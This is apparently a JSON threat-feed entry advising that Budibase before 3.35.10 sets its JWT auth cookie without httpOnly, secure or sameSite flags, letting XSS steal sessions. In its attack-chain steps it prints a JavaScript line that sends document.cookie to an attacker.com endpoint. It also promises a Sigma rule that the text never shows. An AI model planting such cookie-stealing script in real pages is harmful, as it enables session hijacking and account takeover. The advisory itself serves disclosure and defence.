{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/budibase/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to access the cookie\u0026rsquo;s contents. An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account. Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, exacerbating the risk.\nThis vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eAttacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload designed to read the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie using \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe malicious script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example, by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT to authenticate to the Budibase application, bypassing normal login procedures.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the victim\u0026rsquo;s account and can perform actions as the victim, including accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie transforms every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to potential data breaches, unauthorized application modifications, and further propagation of malicious content. This impacts all Budibase deployments running vulnerable versions, potentially affecting a wide range of organizations using the platform for their internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect potential JWT theft attempts via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can now lead to full account takeover.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"}],"language":"en","title":"CraftedSignal Threat Feed — Budibase","version":"https://jsonfeed.org/version/1.1"}